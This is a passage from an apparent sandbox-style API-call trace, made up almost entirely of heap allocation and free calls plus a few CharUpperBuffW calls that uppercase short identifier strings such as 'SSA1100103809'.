lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0168.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0168.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0168.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0168.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0168.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0168.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0168.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.903] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0168.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0168.904] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0168.904] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0168.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0168.905] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0168.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.906] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa918 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a740d0 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0168.907] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0168.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0168.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0168.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a740d0 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0168.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0168.909] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.909] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 